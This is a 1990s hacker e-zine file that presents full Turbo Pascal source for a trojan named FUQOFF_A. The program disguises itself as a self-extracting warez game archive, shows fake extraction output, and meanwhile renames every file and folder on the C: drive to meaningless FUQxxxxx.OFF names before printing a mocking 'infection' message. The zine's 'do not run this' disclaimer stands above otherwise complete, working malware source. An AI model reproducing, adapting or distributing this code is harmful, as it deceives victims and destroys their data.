
                      %%%   %%%  %%%%  %%%   %%  %%%%%
                      %%%% %%%%   %%   %%%%  %%  %%  %%
                      %% %%% %%   %%   %% %% %%  %%   %%
                      %%  %  %%   %%   %%  %%%%  %%  %%
                      %%     %%  %%%%  %%   %%%  %%%%%

                  //     //    ////    //////   //////   //
                  \\  \  \\   \\  \\   \\   \\  \\   \\  \\
                  // /// //  ////////  //////   //////   //
                  \\\\ \\\\  \\    \\  \\ \\    \\         
                  ///   ///  //    //  //  //   //       //
 
              [ Mind Warp  -  Volume #4, Issue #14, File #069 ]
                      [ "huh 69 huh" by >Anonymous< ]
------------------------------------------------------------------------------
                             huh   69   huh
                              [Anonymous]
------------------------------------------------------------------------------

     Woo!  Mind Warp! digizine has reached it's 69th issue.  To commemorate
this accomplishment, and this cool number, influenza inc. has donated some
k-rad turbo pascal source code.  What's it do?  It phucks your computer!
SHould you run it? NO.  DO NOT COMPILE THIS!  DO NOT RUN THIS!  IT IS 
BAD!  Mind Warp! is NOT responsible for this!  DO NOT COME RUNNING TO US!

(*-------------------------- CUT HERE ------------------------------------*)

(* FUQOFF_A Source Code                                                   *)
(* Copyright (c) 1994-1995 [infleunza inc]                                *)
(* Distribute all you want as long as NO CHANGES are made to the original *)
(* Source Code.                                                           *)

(* This code, once compiled and doctored with NoWhere Man's Virus Utility *)
(* package, emulates a 'warez' game that is in compressed form.           *)
(* Specifically, a .LZH Executable.  Once run, it begins renaming ALL     *)
(* files encountered to the format FUQxxxxx.OFF until it completes the    *)
(* hard drive, and then the program will spew a little message from the   *)
(* [infleunza] coders.                                                    *)

(* Currently, this version ONLY infects the C:\ drive.                    *)
(* Mutations include                                                      *)
(* o FUQOFF_B (Infects D:\ Drive)                                         *)
(* o FUQOFF_C (Infects A:\ Drive)                                         *)
(* o FUQOFF_D (Infects B:\ Drive)                                         *)
(* o NITRO    (Infects A,B,C,D, new message string                        *)
(* o BUHFUQ   (Infects C:\, new message string                            *)

uses crt,dos;

var wha:searchrec;
    done:boolean;
    f:file;
    cur1,cur2,numba,loop:integer;
    ext:array[1..5]of char;
    new:string;
    s:byte;
    names:array[1..60]of string;


procedure fillnames;
begin
  names[1]:='LASTRITE.EXE';
  names[2]:='LASTRITE.DAT';
  names[3]:='LASTRITE.DOC';
  names[4]:='README.NOW';
  names[5]:='CGAPICS1.DAT';
  names[6]:='EGAPICS1.DAT';
  names[7]:='VGAPICS1.DAT';
  names[8]:='MCGAPIC1.DAT';
  names[9]:='VESAPIC1.DAT';
  names[10]:='CGAPICS2.DAT';
  names[11]:='EGAPICS2.DAT';
  names[12]:='VGAPICS2.DAT';
  names[13]:='MCGAPIC2.DAT';
  names[14]:='VESAPIC2.DAT';
  names[15]:='CGAPIC3.DAT';
  names[16]:='EGAPIC3.DAT';
  names[17]:='VGAPIC3.DAT';
  names[18]:='MCGA3.DAT';
  names[19]:='VESAPIC3.DAT';
  names[20]:='SBMUSIC.SND';
  names[21]:='ADLMUSIC.SND';
  names[22]:='INTRO.DAT';
  names[23]:='VICTORY.SCN';
  names[24]:='DEFEAT.SCN';
  names[25]:='WAVES.DAT';
  names[26]:='GAMES.DAT';
  names[27]:='ORDER.NFO';
  names[28]:='CONFIG.EXE';
  names[29]:='SETUP.EXE';
  names[30]:='3DBATTLE.BAT';
  names[31]:='CGAPICS4.DAT';
  names[32]:='EGAPICS4.DAT';
  names[33]:='VGAPICS4.DAT';
  names[34]:='MCGAPIC4.DAT';
  names[35]:='VESAPIC4.DAT';
  names[36]:='CGAPICS5.DAT';
  names[37]:='EGAPICS5.DAT';
  names[38]:='VGAPICS5.DAT';
  names[39]:='MCGAPIC5.DAT';
  names[40]:='VESAPIC5.DAT';
  names[41]:='CGAPIC6.DAT';
  names[42]:='EGAPIC6.DAT';
  names[43]:='VGAPIC6.DAT';
  names[44]:='MCGA6.DAT';
  names[45]:='VESAPIC7.DAT';
  names[46]:='CGAPICS8.DAT';
  names[47]:='EGAPICS8.DAT';
  names[48]:='VGAPICS8.DAT';
  names[49]:='MCGAPIC8.DAT';
  names[50]:='VESAPIC8.DAT';
  names[51]:='CGAPICS9.DAT';
  names[52]:='EGAPICS9.DAT';
  names[53]:='VGAPICS9.DAT';
  names[54]:='MCGAPIC9.DAT';
  names[55]:='VESAPIC9.DAT';
  names[56]:='CGAPIC10.DAT';
  names[57]:='EGAPIC10.DAT';
  names[58]:='VGAPIC10.DAT';
  names[59]:='MCGA10.DAT';
  names[60]:='VESAPC10.DAT';
  cur1:=0;
  cur2:=40;
end;

procedure stealth;
begin
  if cur2=40 then begin
    writeln;
    cur1:=cur1+1;
    if cur1=61 then cur1:=4;
    write(names[cur1],' ');
    cur2:=1;
  end;
  write('.');
  cur2:=cur2+1;
end;

procedure makename(special:word);
begin
    stealth;
    case numba of
          0..9:begin
               for loop:=1 to 4 do ext[loop]:='0';
               str(numba,new);
               ext[5]:=new[1];
               end;
          10..99:begin
               for loop:=1 to 3 do ext[loop]:='0';
               str(numba,new);
               ext[4]:=new[1];
               ext[5]:=new[2];
               end;
          100..999:begin
               ext[1]:='0';
               ext[2]:='0';
               str(numba,new);
               for loop:=3 to 5 do ext[loop]:=new[loop-2];
               end;
        else
          ext[1]:='0';
          str(numba,new);
          for loop:=2 to 5 do ext[loop]:=new[loop-1];
        end;

        findfirst('*.*',special,wha);
        if special<>$10 then begin
          if ((wha.name[1]='F') and (wha.name[2]='U') and (wha.name[3]='Q')) then
            repeat
              findnext(wha);
            until ((wha.name[1]<>'F') or (wha.name[2]<>'U') or (wha.name[3]<>'Q')) or (doserror<>0);
        end else begin

          findfirst('*.*',$10,wha);
          if ((wha.attr<>$10) and (doserror=0)) or (wha.name='.') or (wha.name='..')
          or ((wha.name[1]='F') and (wha.name[2]='U') and (wha.name[3]='Q')) then
          repeat
            findnext(wha);
          until (doserror<>0) or ((wha.attr=$10) and ((wha.name<>'.') and
            (wha.name<>'..')) and ((wha.name[1]<>'F') or (wha.name[2]<>'U')
            or (wha.name[3]<>'Q')));
       end;
        if (doserror=0) then begin
          assign(f,wha.name);
          if ('FUQ'+ext[1]+ext[2]+ext[3]+ext[4]+ext[5]+'OFF')<>wha.name then
            rename(f,'FUQ'+ext[1]+ext[2]+ext[3]+ext[4]+ext[5]+'OFF');
          numba:=numba+1;
        end;
end;

procedure changeit;
begin
  repeat
  findfirst('*.*',archive,wha);
    if (doserror=0) and ((wha.name[1]<>'F') or (wha.name[2]<>'U')
        or (wha.name[3]<>'Q')) then
      repeat
        makename($20);
      until doserror<>0;
    findfirst('*.*',$10,wha);
    if ((wha.attr<>$10) and (doserror=0)) or (wha.name='.') or (wha.name='..')
      or ((wha.name[1]='F') and (wha.name[2]='U') and (wha.name[3]='Q')) then
      repeat
        findnext(wha);
      until (doserror<>0) or ((wha.attr=$10) and ((wha.name<>'.') and
        (wha.name<>'..')) and ((wha.name[1]<>'F') or (wha.name[2]<>'U')
        or (wha.name[3]<>'Q')));
    if doserror<>0 then begin
        getdir(s,new);
        if new='C:\' then done:=true else chdir('..')  {change to C:\}
      end else
      if (wha.name<>'.') and (wha.name<>'..') then begin
        makename($10);
        chdir('FUQ'+ext[1]+ext[2]+ext[3]+ext[4]+ext[5]+'.OFF');
      end;
  until (doserror<>0) and (done=true);
end;

begin
  textcolor(white);
  fillnames;
  writeln('LHA',chr(39),'S SFX 2.13s (c) Yoshi, 1991');
  writeln;
  chdir('c:\');
  s:=3;
  numba:=0;
  changeit;
  writeln;
  writeln('Error!  Archive Damaged.  Error Code 16!');
  writeln('ERR 16 - ????');
  writeln; writeln; writeln;
  writeln('ERR 1      = Bad CRC Check');
  writeln('ERR 2      = Missing CRC''s');
  writeln('ERR 3 - 14 = File size misreport! <specified>');
  writeln('ERR 15     = No files found.');
  writeln('ERR 16     = iNFeCTiON [infleunza]');
  writeln; writeln;
  writeln('Should have taken your flu shot...95 is gonna be a bitch.');
  writeln('mustaine [infleunza]...KiCKiN'' iT FRoM CoLLEGE');
end.

(*-------------------------- CUT HERE ------------------------------------*)

==============================================================================
            Call Omniverse, the Mind Warp WHQ - (301) 718-0225
==============================================================================

